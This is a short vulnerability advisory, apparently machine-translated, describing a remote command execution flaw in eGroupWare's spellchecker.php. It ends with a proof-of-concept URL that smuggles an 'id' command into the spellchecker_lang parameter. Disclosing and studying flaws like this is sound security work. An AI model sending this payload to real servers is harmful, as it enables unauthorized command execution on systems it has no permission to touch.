Egroupware Spellchecker Php Remote Command Execution Vulnerability
Egroupware Spellchecker Php Remote Command Execution Vulnerability
eGroupWare spellchecker.php remote command execution vulnerability
Vulnerability Description
eGroupWare is a multi-user, WEB-based workpiece set developed based on custom sets on PHP-based APIs, where command execution vulnerabilities exist in the spellchecker.php file
Vulnerability Impact
eGroupWare
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
/egroupware/phpgwapi/js/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php?spellchecker_lang=egroupware_spellchecker_cmd_exec.nasl%7C%7Cid%7C%7C
This post is licensed under CC BY 4.0 by the author.